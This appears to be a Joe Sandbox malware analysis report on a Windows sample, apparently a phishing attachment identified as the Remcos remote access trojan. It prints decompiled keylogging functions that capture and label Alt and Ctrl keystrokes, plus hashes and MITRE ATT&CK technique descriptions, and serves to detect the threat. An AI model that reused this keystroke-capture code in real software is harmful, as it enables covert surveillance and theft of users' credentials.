Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx$@
API String ID: 2593887523-1288605549
Opcode ID: fa53c4b1efa0943462c88759d19cc67ec6d1fc6053c53cb60ae7065c619b4311
Instruction ID: d51398674981bb72eabf597e0de5951d7e9872e17945c585b36a5d9ca4153329
Opcode Fuzzy Hash: fa53c4b1efa0943462c88759d19cc67ec6d1fc6053c53cb60ae7065c619b4311
Instruction Fuzzy Hash: 98F02431600218FBCB115F50DC02EAEBF60EF04712B10406AFC096A271DA758E24DA99

Uniqueness

Uniqueness Score: -1.00%

Function 00409B13, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E00409B13(void* __ebx, void* __ecx) {
				void* _t4;
				void* _t7;
				void* _t10;
				signed int _t12;
				void* _t13;
				void* _t17;
				void* _t18;

				_t10 = __ebx;
				_t17 = __ecx;
				_t12 = GetKeyState(0x11) & 0x0000ffff;
				_t4 =  *((intOrPtr*)(_t17 + 0x4c)) - 0xa4;
				if(_t4 == 0) {
					_t13 = _t18 - 0x18;
					_push("[AltL]");
					L6:
					E00402064(_t10, _t13);
					return E00408B5B(_t17);
				}
				_t7 = _t4 - 1;
				if(_t7 == 0) {
					if(_t12 == 0) {
						_t13 = _t18 - 0x18;
						_push("[AltR]");
						goto L6;
					}
					return _t7;
				} else {
					E004089BC(_t17, _t18 - 0x18);
					return E00408B82(_t17);
				}
			}

0x00409b13
0x00409b16
0x00409b1e
0x00409b24
0x00409b29
0x00409b58
0x00409b5a
0x00409b5f
0x00409b5f
0x00000000
0x00409b66
0x00409b2b
0x00409b2e
0x00409b47
0x00409b4c
0x00409b4e
0x00000000
0x00409b4e
0x00409b6c
0x00409b30
0x00409b36
0x00409b43
0x00409b43

APIs

GetKeyState.USER32 ref: 00409B18

Part of subcall function 004089BC: GetForegroundWindow.USER32(00000000,?,00000000), ref: 004089F0
Part of subcall function 004089BC: GetWindowThreadProcessId.USER32(00000000,?), ref: 004089FB
Part of subcall function 004089BC: GetKeyboardLayout.USER32 ref: 00408A02
Part of subcall function 004089BC: GetKeyState.USER32 ref: 00408A0C
Part of subcall function 004089BC: GetKeyboardState.USER32(?), ref: 00408A19
Part of subcall function 004089BC: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00408A35

Part of subcall function 00408B82: SetEvent.KERNEL32(?,?,?,?,00409CFE,?,?,?,?,?,00000000), ref: 00408BAF

Strings

[AltL], xrefs: 00409B5A
[AltR], xrefs: 00409B4E

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
String ID: [AltL]$[AltR]
API String ID: 3195419117-2658077756
Opcode ID: e7e69a8015016de377639f1557ea7a6bb2431f24d1a3b105f45226ed017d3fc2
Instruction ID: c4d2659865d98af4fcd7119fbddd7e9e9c3bf4c394698bf3eb8d90a046221ecf
Opcode Fuzzy Hash: e7e69a8015016de377639f1557ea7a6bb2431f24d1a3b105f45226ed017d3fc2
Instruction Fuzzy Hash: BAE0E52130422096C868353E7A2B77D38309741775B40016FFA86BB2C7CC6E6E1542CF

Uniqueness

Uniqueness Score: -1.00%

Function 004410D3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,00435084), ref: 00441112

Strings

GetSystemTimePreciseAsFileTime, xrefs: 004410EE
@, xrefs: 00441108

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Time$FileSystem
String ID: GetSystemTimePreciseAsFileTime$@
API String ID: 2086374402-2730348301
Opcode ID: 725ffb0da7229b128c7fa3089461aada825b446c50f7b3826ff879ece796b463
Instruction ID: 905004eebb46221c2d070f6dd192413a4baa945a661a41a47a192c014b97a96b
Opcode Fuzzy Hash: 725ffb0da7229b128c7fa3089461aada825b446c50f7b3826ff879ece796b463
Instruction Fuzzy Hash: 99E05531B40218F787116F24AC0293FBB60DB88B13B10027AFC0517293D9384E049AEE

Uniqueness

Uniqueness Score: -1.00%

Function 00409B6D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E00409B6D(void* __ebx, void* __ecx) {
				void* _t4;
				void* _t7;
				signed int _t9;
				void* _t10;
				void* _t12;
				void* _t13;

				_t7 = __ebx;
				_t12 = __ecx;
				_t9 = GetKeyState(0x12) & 0x0000ffff;
				_t4 =  *((intOrPtr*)(_t12 + 0x4c)) - 0xa2;
				if(_t4 == 0) {
					if(_t9 == 0) {
						_t10 = _t13 - 0x18;
						_push("[CtrlL]");
						goto L5;
					}
				} else {
					_t4 = _t4 - 1;
					if(_t4 == 0) {
						_t10 = _t13 - 0x18;
						_push("[CtrlR]");
						L5:
						E00402064(_t7, _t10);
						return E00408B5B(_t12);
					}
				}
				return _t4;
			}

0x00409b6d
0x00409b70
0x00409b78
0x00409b7e
0x00409b83
0x00409b99
0x00409b9e
0x00409ba0
0x00000000
0x00409ba0
0x00409b85
0x00409b85
0x00409b88
0x00409b8d
0x00409b8f
0x00409ba5
0x00409ba5
0x00000000
0x00409bac
0x00409b88
0x00409bb2

APIs

GetKeyState.USER32 ref: 00409B72

Strings

[CtrlR], xrefs: 00409B8F
[CtrlL], xrefs: 00409BA0

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: State
String ID: [CtrlL]$[CtrlR]
API String ID: 1649606143-2446555240
Opcode ID: 7027ef106238da33c7454ea49620c7fac249aa787e7ecc46e2191b46386816e4
Instruction ID: cea09931438cfbcfb908a0ec35844698eb9bcc799b3f2bfa8f27856a595198d3
Opcode Fuzzy Hash: 7027ef106238da33c7454ea49620c7fac249aa787e7ecc46e2191b46386816e4
Instruction Fuzzy Hash: 2CE048216043109AC824353EA66B6693920B741771F40017FF946675C7C9AEAF05429B

Uniqueness

Uniqueness Score: -1.00%

Function 00449BA9, Relevance: 5.1, APIs: 4, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00449BA9(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
				char* _v8;
				int _v12;
				char _v16;
				char _v24;
				char _v28;
				void* __ebx;
				char _t34;
				int _t35;
				int _t38;
				long _t39;
				char* _t42;
				int _t44;
				int _t47;
				int _t53;
				intOrPtr _t55;
				void* _t56;
				char* _t57;
				char* _t62;
				char* _t63;
				void* _t64;
				int _t65;
				short* _t67;
				short* _t68;
				int _t69;
				intOrPtr* _t70;

				_t64 = __edx;
				_t53 = _a12;
				_t67 = _a4;
				_t68 = 0;
				if(_t67 == 0) {
					L3:
					if(_a8 != _t68) {
						L00434E17(_t53,  &_v28, _t64, _a16);
						_t34 = _v24;
						__eflags = _t67;
						if(_t67 == 0) {
							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
								_t69 = _t68 | 0xffffffff;
								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
								__eflags = _t35;
								if(_t35 != 0) {
									L29:
									_t28 = _t35 - 1; // -1
									_t69 = _t28;
									L30:
									__eflags = _v16;
									if(_v16 != 0) {
										_t55 = _v28;
										_t31 = _t55 + 0x350;
										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
										__eflags =  *_t31;
									}
									return _t69;
								}
								 *((intOrPtr*)(L00439E14())) = 0x2a;
								goto L30;
							}
							_t70 = _a8;
							_t56 = _t70 + 1;
							do {
								_t38 =  *_t70;
								_t70 = _t70 + 1;
								__eflags = _t38;
							} while (_t38 != 0);
							_t69 = _t70 - _t56;
							goto L30;
						}
						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
							_t69 = _t68 | 0xffffffff;
							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
							__eflags = _t35;
							if(_t35 != 0) {
								goto L29;
							}
							_t39 = GetLastError();
							__eflags = _t39 - 0x7a;
							if(_t39 != 0x7a) {
								L21:
								 *((intOrPtr*)(L00439E14())) = 0x2a;
								 *_t67 = 0;
								goto L30;
							}
							_t42 = _a8;
							_t57 = _t42;
							_v8 = _t57;
							_t65 = _t53;
							__eflags = _t53;
							if(_t53 == 0) {
								L20:
								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
								__eflags = _t44;
								if(_t44 != 0) {
									_t69 = _t44;
									goto L30;
								}
								goto L21;
							} else {
								goto L15;
							}
							while(1) {
								L15:
								_t45 =  *_t57;
								_v12 = _t65 - 1;
								__eflags =  *_t57;
								if(__eflags == 0) {
									break;
								}
								_t47 = E00443234(__eflags, _t45 & 0x000000ff,  &_v24);
								_t62 = _v8;
								__eflags = _t47;
								if(_t47 == 0) {
									L18:
									_t65 = _v12;
									_t57 = _t62 + 1;
									_v8 = _t57;
									__eflags = _t65;
									if(_t65 != 0) {
										continue;
									}
									break;
								}
								_t62 = _t62 + 1;
								__eflags =  *_t62;
								if( *_t62 == 0) {
									goto L21;
								}
								goto L18;
							}
							_t42 = _a8;
							goto L20;
						}
						__eflags = _t53;
						if(_t53 == 0) {
							goto L30;
						}
						_t63 = _a8;
						while(1) {
							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
							__eflags =  *(_t68 + _t63);
							if( *(_t68 + _t63) == 0) {
								goto L30;
							}
							_t68 =  &(_t68[0]);
							_t67 =  &(_t67[1]);
							__eflags = _t68 - _t53;
							if(_t68 < _t53) {
								continue;
							}
							goto L30;
						}
						goto L30;
					}
					 *((intOrPtr*)(L00439E14())) = 0x16;
					return E0043626D() | 0xffffffff;
				}
				if(_t53 != 0) {
					 *_t67 = 0;
					goto L3;
				}
				return 0;
			}

0x00449ba9
0x00449bb2
0x00449bb7
0x00449bba
0x00449bbe
0x00449bcd
0x00449bd0
0x00449bf0
0x00449bf5
0x00449bf8
0x00449bfa
0x00449cc8
0x00449cce
0x00449ce3
0x00449cef
0x00449cf5
0x00449cf7
0x00449d06
0x00449d06
0x00449d06
0x00449d09
0x00449d09
0x00449d0d
0x00449d0f
0x00449d12
0x00449d12
0x00449d12
0x00449d12
0x00000000
0x00449d19
0x00449cfe
0x00000000
0x00449cfe
0x00449cd0
0x00449cd3
0x00449cd6
0x00449cd6
0x00449cd8
0x00449cd9
0x00449cd9
0x00449cdd
0x00000000
0x00449cdd
0x00449c00
0x00449c06
0x00449c33
0x00449c3f
0x00449c45
0x00449c47
0x00000000
0x00000000
0x00449c4d
0x00449c53
0x00449c56
0x00449cb2
0x00449cb7
0x00449cbf
0x00000000
0x00449cbf
0x00449c58
0x00449c5b
0x00449c5d
0x00449c60
0x00449c62
0x00449c64
0x00449c9a
0x00449ca8
0x00449cae
0x00449cb0
0x00449cc4
0x00000000
0x00449cc4
0x00000000
0x00000000
0x00000000
0x00000000
0x00449c66
0x00449c66
0x00449c66
0x00449c69
0x00449c6c
0x00449c6e
0x00000000
0x00000000
0x00449c78
0x00449c7f
0x00449c82
0x00449c84
0x00449c8c
0x00449c8c
0x00449c8f
0x00449c90
0x00449c93
0x00449c95
0x00000000
0x00000000
0x00000000
0x00449c95
0x00449c86
0x00449c87
0x00449c8a
0x00000000
0x00000000
0x00000000
0x00449c8a
0x00449c97
0x00000000
0x00449c97
0x00449c08
0x00449c0a
0x00000000
0x00000000
0x00449c10
0x00449c13
0x00449c17
0x00449c1a
0x00449c1e
0x00000000
0x00000000
0x00449c24
0x00449c25
0x00449c28
0x00449c2a
0x00000000
0x00000000
0x00000000
0x00449c2c
0x00000000
0x00449c13
0x00449bd7
0x00000000
0x00449be2
0x00449bc4
0x00449bca
0x00000000
0x00449bca
0x00449d21

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D19), ref: 00449C3F
GetLastError.KERNEL32 ref: 00449C4D
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00449CA8

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: fc2fb504ed02e87538f3f2fd2868c89ab1788b614ebdc1108658ba2c237d8c97
Instruction ID: 5efc437444c55a2553be1355019520536607b5826bc4926f33f38679912f85d6
Opcode Fuzzy Hash: fc2fb504ed02e87538f3f2fd2868c89ab1788b614ebdc1108658ba2c237d8c97
Instruction Fuzzy Hash: 18414975A00206AFEF218F65D884ABB7BA4EF01314F2441AFF8559B391E7388D01E769

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist , and "net start" using Net , but adversaries may also use other tools as well. Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report RFQ-Order_Sheet#43254363-Sept-21_signed-copy.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Remcos

Yara Overview

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

Function 0040D072, Relevance: 84.1, APIs: 28, Strings: 20, Instructions: 98
libraryloaderCOMMON

Function 00404E64, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 96
timethreadCOMMON

Function 0040D455, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88
sleepCOMMON

Function 004166F6, Relevance: 3.0, APIs: 2, Instructions: 41
COMMON

Function 0040D585, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Function 0042F1CD, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Function 0040C641, Relevance: 60.3, APIs: 16, Strings: 18, Instructions: 769
synchronizationCOMMON

Function 00411319, Relevance: 28.7, APIs: 6, Strings: 10, Instructions: 728
sleepnetworkthreadCOMMON

Function 004179B3, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 134
COMMON

Function 00411D70, Relevance: 11.0, APIs: 7, Instructions: 458
COMMON

Function 00410497, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38
registryCOMMON

Function 00404C75, Relevance: 6.1, APIs: 4, Instructions: 128
synchronizationthreadCOMMON

Function 00410420, Relevance: 4.5, APIs: 3, Instructions: 42
registryCOMMON

Function 00410275, Relevance: 4.5, APIs: 3, Instructions: 37
registryCOMMON

Function 00416828, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17
COMMON

Function 00416AF4, Relevance: 3.0, APIs: 2, Instructions: 20
COMMON

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre